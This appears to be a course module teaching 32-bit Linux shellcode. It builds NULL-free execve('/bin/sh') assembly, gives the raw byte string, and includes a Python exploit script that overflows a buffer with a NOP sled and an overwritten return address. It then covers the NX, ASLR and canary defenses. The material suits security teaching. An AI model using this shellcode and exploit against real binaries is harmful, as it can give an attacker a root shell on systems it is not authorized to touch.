Shellcode

The previous module showed how overwriting a return address redirects execution to existing code — a target() function already in the binary. But real binaries rarely contain a ready-made execve("/bin/sh", …) call. When there is no convenient target to hijack, an attacker injects their own machine code into the process and points the return address at it. That injected payload is called shellcode, because its classic goal is spawning an interactive shell.

Writing shellcode forces you to understand the lowest-level details of how programs communicate with the operating system: the system-call interface.

The Linux system-call interface

User programs cannot directly access hardware resources — they must ask the kernel via system calls. On Linux, the CPU transitions from user mode to kernel mode, executes the requested service, and returns. In assembly you trigger this transition with a single instruction; which instruction depends on the ABI:

ABI	Trigger instruction	Syscall # register	Arg registers (in order)
x86 32-bit (i386)	`int $0x80`	`%eax`	`%ebx`, `%ecx`, `%edx`, `%esi`, `%edi`, `%ebp`
x86-64	`syscall`	`%rax`	`%rdi`, `%rsi`, `%rdx`, `%r10`, `%r8`, `%r9`

The simplest example: getpid is syscall number 20 (0x14) on 32-bit Linux. To call it:

mov $0x14, %eax   # syscall number for getpid
int $0x80         # enter the kernel

Every syscall has a fixed number you can look up (e.g., at syscalls32.paolostivanin.com). The kernel ignores register contents it does not need for a given call.
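The register conventions in the table can be captured in a small lookup, which makes it easy to see what a given call needs before writing any assembly. This is only an illustrative sketch: the `register_plan` helper and the buffer address are hypothetical, and the `write` example assumes its i386 syscall number, 4.

```python
# Register conventions from the table above; the helper itself is hypothetical.
SYSCALL_ABI = {
    "i386": {
        "trigger": "int $0x80",
        "number": "%eax",
        "args": ["%ebx", "%ecx", "%edx", "%esi", "%edi", "%ebp"],
    },
    "x86_64": {
        "trigger": "syscall",
        "number": "%rax",
        "args": ["%rdi", "%rsi", "%rdx", "%r10", "%r8", "%r9"],
    },
}


def register_plan(abi, number, *args):
    """Return {register: value} for one system call under the given ABI."""
    conv = SYSCALL_ABI[abi]
    if len(args) > len(conv["args"]):
        raise ValueError("at most six arguments fit in registers")
    plan = {conv["number"]: number}
    plan.update(zip(conv["args"], args))
    return plan


# getpid takes no arguments, so only the number register is set.
print(register_plan("i386", 0x14))

# A three-argument call such as write(fd, buf, count), number 4 on i386.
# The buffer address is a made-up placeholder.
print(register_plan("i386", 4, 1, 0x0804A000, 12))
```

Registers that do not appear in the returned plan are the ones the kernel ignores for that call.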

The target syscall: execve

The goal of most shellcode is to call execve, which replaces the current process image with a new program:

int execve(const char *filename, char *const argv[], char *const envp[]);

Called as execve("/bin/sh", {"/bin/sh", NULL}, NULL) it spawns a shell — and if the victim process was Set-UID root, that shell inherits root privileges.

On 32-bit Linux, sys_execve is syscall 0x0b (11). The register mapping is:

Register	Value
`%eax`	`0x0b` (syscall number)
`%ebx`	pointer to the filename string (`"/bin/sh"`)
`%ecx`	pointer to the argv array (`{ptr_to_binsh, NULL}`)
`%edx`	pointer to the envp array (NULL — no environment)

Building execve shellcode step by step

The challenge is that shellcode must be position-independent: it has no idea where in memory it will land, so it cannot use hardcoded addresses. The classic solution is to build the "/bin/sh" string and the argv array on the stack at runtime, then read their addresses back from %esp.

Step 1 — Push "/bin/sh" onto the stack

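In 32-bit mode, push moves the stack in 4-byte dwords. The string "/bin/sh" is 7 bytes; pad it to 8 by writing "//bin/sh" (the double slash is harmless to the kernel). Push a null terminator first, then the string's 4-byte chunks in reverse order: the stack grows toward lower addresses, so the chunk pushed last ends up at the lowest address, where the string must begin.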

xor  %eax, %eax          # zero eax (no NULL bytes in the instruction)
mov  %eax, %edx          # edx = 0  (envp = NULL)
push %eax                # push null terminator for the string
push $0x68732f6e         # "n/sh" (little-endian: 6e 2f 73 68)
push $0x69622f2f         # "//bi" (little-endian: 2f 2f 62 69)
mov  %esp, %ebx          # ebx --> "//bin/sh\0" on the stack

After these pushes %esp points at the start of "//bin/sh", so mov %esp, %ebx gives us the filename pointer.
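The two push immediates do not have to be worked out by hand. A minimal sketch, assuming the string has already been padded to a multiple of 4 bytes (the `push_immediates` helper is hypothetical):

```python
import struct


def push_immediates(s: bytes):
    """Split a string into 4-byte little-endian dwords, in push order.

    The last chunk comes first because the stack grows downward: whatever
    is pushed last ends up at the lowest address, i.e. the string's start.
    """
    if len(s) % 4 != 0:
        raise ValueError("pad the string to a multiple of 4 bytes first")
    chunks = [s[i:i + 4] for i in range(0, len(s), 4)]
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]


for imm in push_immediates(b"//bin/sh"):
    print(f"push $0x{imm:08x}")
```

For "//bin/sh" this prints the same two immediates used in Step 1, 0x68732f6e followed by 0x69622f2f.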

Step 2 — Build the argv array and set %ecx

execve needs argv = {ptr_to_binsh, NULL}. Push NULL (already in %eax) then push %ebx, then capture %esp:

push %eax                # argv[1] = NULL
push %ebx                # argv[0] = pointer to "//bin/sh"
mov  %esp, %ecx          # ecx --> { ptr_to_binsh, NULL }

Step 3 — Set %eax and invoke

movb $0x0b, %al          # eax = 0x0b (low byte only, avoids NULL bytes)
int  $0x80               # syscall: execve("//bin/sh", argv, NULL)

Complete NULL-free shellcode

xor  %eax, %eax          # eax = 0
mov  %eax, %edx          # edx = 0  (envp)
push %eax                # null terminator
push $0x68732f6e         # "n/sh"
push $0x69622f2f         # "//bi"
mov  %esp, %ebx          # ebx --> filename
push %eax                # argv[1] = NULL
push %ebx                # argv[0] = ptr to filename
mov  %esp, %ecx          # ecx --> argv
movb $0x0b, %al          # eax = 11
int  $0x80               # enter the kernel
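To check that the registers really point where the comments say, the listing can be traced against a toy model of the stack. This is a sketch, not a CPU emulator: the `Stack` class and the starting %esp value are assumptions made purely for illustration.

```python
import struct


class Stack:
    """Toy model of a downward-growing 32-bit stack."""

    def __init__(self, esp):
        self.esp = esp
        self.mem = {}  # address -> byte value

    def push(self, value):
        # push decrements %esp by 4, then stores the dword little-endian.
        self.esp -= 4
        for i, byte in enumerate(struct.pack("<I", value)):
            self.mem[self.esp + i] = byte

    def read(self, addr, n):
        return bytes(self.mem[addr + i] for i in range(n))


st = Stack(esp=0xFFFFD000)   # hypothetical %esp when the shellcode starts
eax = 0                      # xor  %eax, %eax
edx = eax                    # mov  %eax, %edx
st.push(eax)                 # push %eax          (string terminator)
st.push(0x68732F6E)          # push $0x68732f6e   ("n/sh")
st.push(0x69622F2F)          # push $0x69622f2f   ("//bi")
ebx = st.esp                 # mov  %esp, %ebx
st.push(eax)                 # push %eax          (argv[1] = NULL)
st.push(ebx)                 # push %ebx          (argv[0])
ecx = st.esp                 # mov  %esp, %ecx
eax = 0x0B                   # movb $0x0b, %al

filename = st.read(ebx, 9)
argv = struct.unpack("<II", st.read(ecx, 8))
print(filename, [hex(p) for p in argv], hex(eax), edx)
```

In this model %ebx points at the 9 bytes "//bin/sh" plus the terminator, and %ecx points at a two-entry array holding that same address followed by NULL.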

The NULL-byte problem — and how to fix it

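String-copying functions like strcpy stop at the first \x00 byte, so a single NULL byte anywhere in the shellcode silently truncates the payload and the rest of the code never reaches the buffer. (gets behaves differently: it reads through NULL bytes and stops at a newline, \x0a, so a payload delivered through gets must avoid that byte instead.)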

The naive version of this shellcode contains several NULL bytes:

b8 0b 00 00 00   mov  $0xb, %eax      ← three NULLs
b9 00 00 00 00   mov  $0x0, %ecx      ← four NULLs
ba 00 00 00 00   mov  $0x0, %edx      ← four NULLs
6a 00            push $0x0            ← one NULL

The fixes applied above:

Naive (contains NULLs)	NULL-free replacement	Why it works
`mov $0x0, %eax`	`xor %eax, %eax`	XOR of a register with itself is always 0; opcode `31 c0` has no zero bytes
`push $0x0`	`push %eax` (after zeroing)	pushes the already-zeroed register
`mov $0x0b, %eax` (opcode `b8 0b 00 00 00`)	`movb $0x0b, %al` (opcode `b0 0b`)	writes only the low byte; upper bytes were already zeroed by `xor`
`mov $0x0, %edx`	`mov %eax, %edx` (after zeroing `%eax`)	copies zero without embedding a zero byte
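A quick scan for forbidden bytes catches these problems before the payload is ever delivered. The following is a minimal sketch; the `find_bad_bytes` helper is hypothetical, and the set of bad bytes depends on how the vulnerable program reads its input (for example, a newline-terminated reader would also forbid 0x0a).

```python
def find_bad_bytes(payload: bytes, bad: bytes = b"\x00"):
    """Return (offset, byte) pairs for every forbidden byte in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


naive = bytes.fromhex("b80b000000")   # mov  $0xb, %eax
fixed = bytes.fromhex("31c0b00b")     # xor  %eax, %eax ; movb $0x0b, %al

print(find_bad_bytes(naive))          # offsets of the three zero bytes
print(find_bad_bytes(fixed))          # empty list: nothing to fix
```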

Assembling and extracting the bytes

Write the shellcode as an assembly file (shellcode.S), assemble it, then extract the raw bytes with objcopy or objdump:

gcc -m32 -nostdlib -static -o shellcode shellcode.S
objdump -d shellcode | grep -Po '\t\K[0-9a-f ]+(?=\t)'

The assembled bytes for the complete shellcode are:

\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89
\xe1\xb0\x0b\xcd\x80

No byte in this sequence is \x00.
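The extraction step can also be done in Python by parsing the disassembly text. The sketch below assumes the usual `objdump -d` layout of address, tab, hex bytes, tab, mnemonic; the sample lines are illustrative, with made-up addresses, and the helper names are hypothetical.

```python
import re

# Illustrative `objdump -d` lines; the addresses are made up.
SAMPLE = (
    " 8049000:\t31 c0                \txor    %eax,%eax\n"
    " 8049002:\t89 c2                \tmov    %eax,%edx\n"
    " 8049004:\t50                   \tpush   %eax\n"
    " 8049005:\t68 6e 2f 73 68       \tpush   $0x68732f6e\n"
)

# address, colon, tab, then one or more "xx " hex pairs.
LINE = re.compile(r"^\s*[0-9a-f]+:\t((?:[0-9a-f]{2} )+)\s*(?:\t|$)")


def bytes_from_objdump(text: str) -> bytes:
    """Collect the instruction bytes from objdump -d style text."""
    out = bytearray()
    for line in text.splitlines():
        match = LINE.match(line)
        if match:
            out += bytes.fromhex(match.group(1))
    return bytes(out)


def as_escapes(data: bytes) -> str:
    """Format bytes as a \\xNN string ready to paste into a script."""
    return "".join(f"\\x{b:02x}" for b in data)


print(as_escapes(bytes_from_objdump(SAMPLE)))
```

Run on the sample, this reproduces the first ten bytes of the sequence listed above.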

Delivering the shellcode: the exploit script

With the raw bytes in hand, the exploit script (Python 3) assembles the full payload:

#!/usr/bin/env python3
import sys

shellcode = (
    b"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68"
    b"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89"
    b"\xe1\xb0\x0b\xcd\x80"
)

content = bytearray(0x90 for _ in range(100))  # NOP sled
start = 16
content[start:start + len(shellcode)] = shellcode

ret    = 0xffffcfd0  # estimated address inside the NOP sled
offset = 76          # bytes from buffer start to saved return address
L = 4                # 4 bytes for 32-bit address
content[offset:offset + L] = ret.to_bytes(L, byteorder='little')

sys.stdout.buffer.write(content)

Key points: the buffer is prefilled with \x90 (NOP, opcode 0x90) rather than 'A', the shellcode is placed at an arbitrary offset inside the sled, and the return address is written at the offset discovered by cyclic/GDB. Because x86 is little-endian, ret.to_bytes(L, byteorder='little') writes the address bytes in the correct order.
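The same layout can be wrapped in a function that checks its own assumptions, which helps when the offset or the shellcode changes. This is a sketch only: `build_payload` is a hypothetical helper, and the default values simply mirror the script above.

```python
SHELLCODE = (
    b"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68"
    b"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89"
    b"\xe1\xb0\x0b\xcd\x80"
)


def build_payload(shellcode: bytes, ret: int, offset: int,
                  start: int = 16, size: int = 100) -> bytes:
    """NOP-filled buffer with shellcode at `start` and `ret` at `offset`."""
    if start + len(shellcode) > offset:
        raise ValueError("shellcode would overlap the return-address slot")
    if offset + 4 > size:
        raise ValueError("return-address slot lies outside the payload")
    payload = bytearray(b"\x90" * size)
    payload[start:start + len(shellcode)] = shellcode
    # x86 is little-endian, so the low byte of the address goes first.
    payload[offset:offset + 4] = ret.to_bytes(4, byteorder="little")
    return bytes(payload)


payload = build_payload(SHELLCODE, ret=0xFFFFCFD0, offset=76)
print(len(payload), payload[76:80].hex())
```

The two checks guard against the most common layout mistakes: shellcode that runs into the return-address slot, and an offset that falls outside the buffer.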

Guessing the address: the NOP sled

Even after finding the buffer-to-return-address offset, you still need to guess where in memory the buffer lives — that is, what value to write as the new return address. Stack addresses vary between runs due to environment differences and ASLR.

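The NOP sled (\x90\x90…) solves this: if the guessed address lands anywhere in the sled, execution slides harmlessly down the NOPs into the shellcode. Only the NOPs that precede the shellcode help, so a sled of n bytes in front of it widens the valid target window by n addresses. In the script above, where the shellcode starts at offset 16, that is 16 extra addresses that make an imprecise guess succeed.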
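The size of the target window follows directly from the payload layout: a guess works if it hits the first byte of the shellcode or any NOP in front of it. A minimal sketch, in which the buffer address is a made-up value and both helpers are hypothetical:

```python
def landing_window(buf_addr: int, start: int):
    """Inclusive range of return addresses that reach the shellcode intact.

    buf_addr is where the payload begins in memory; start is the offset of
    the shellcode inside it, so bytes [0, start) are the useful sled.
    """
    return buf_addr, buf_addr + start


def guess_succeeds(guess: int, buf_addr: int, start: int) -> bool:
    low, high = landing_window(buf_addr, start)
    return low <= guess <= high


BUF_ADDR = 0xFFFFCFC8  # hypothetical buffer address, for illustration only
low, high = landing_window(BUF_ADDR, start=16)
print(hex(low), hex(high), high - low + 1)
print(guess_succeeds(0xFFFFCFD0, BUF_ADDR, start=16))
```

NOPs placed after the shellcode do not enlarge the window, because execution never reaches them.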

Defenses that break this attack

Three mitigations stand in the way of this attack:

Non-Executable Stack (NX / W^X): The OS marks stack pages as non-executable and the CPU enforces it. If %eip ever points into the stack, the CPU raises a fault. This stops injected shellcode cold, which is why modern exploit techniques pivoted to Return-Oriented Programming (ROP), reusing existing executable code.
ASLR (Address Space Layout Randomization): The OS randomizes the base address of the stack (and heap, libraries) on every execution. With kernel.randomize_va_space=2, both stack and heap addresses change each run, making it hard to guess where the NOP sled lives. Compiling with gcc -no-pie -fno-pic produces a non-PIE binary whose code and data load at fixed absolute addresses, which makes it easier to exploit; PIE binaries under ASLR are much harder because their code addresses are randomized as well.
Stack canaries (StackGuard): A secret value placed between the buffer and the return address; overwriting it is detected before ret executes.
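When reproducing the attack in a lab, it helps to know which ASLR mode the machine is in. The sketch below reads the kernel.randomize_va_space setting mentioned above from /proc, if that file exists; the helper names are hypothetical and the descriptions are short summaries of the three documented values.

```python
from pathlib import Path

ASLR_MODES = {
    0: "disabled: no address randomization",
    1: "stack, mmap base (shared libraries) and vDSO are randomized",
    2: "as mode 1, plus the brk-managed heap is randomized",
}


def describe_aslr(value: int) -> str:
    """Human-readable summary of a randomize_va_space value."""
    return ASLR_MODES.get(value, "unknown setting")


def current_aslr_setting(path="/proc/sys/kernel/randomize_va_space"):
    """Return the current setting as an int, or None if it cannot be read."""
    try:
        return int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return None


setting = current_aslr_setting()
if setting is None:
    print("randomize_va_space not available on this system")
else:
    print(setting, describe_aslr(setting))
```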

Key takeaways

Shellcode is self-contained machine code injected into a vulnerable process to perform an action — typically spawning a shell via a direct syscall.
The 32-bit Linux syscall ABI: load the syscall number into %eax, arguments into %ebx/%ecx/%edx, then execute int $0x80.
sys_execve is syscall 0x0b; its three arguments map to %ebx (filename), %ecx (argv), %edx (envp).
Position independence is achieved by building strings and pointer arrays on the stack at runtime and reading addresses from %esp.
Every instruction that encodes a zero byte must be replaced: xor %eax,%eax instead of mov $0,%eax; movb $0x0b,%al instead of mov $0x0b,%eax.
A NOP sled (\x90 bytes prepended to the shellcode) tolerates imprecise guesses of the shellcode's address.
NX stack defeats injected shellcode by making stack pages non-executable; ASLR makes the injection address hard to guess.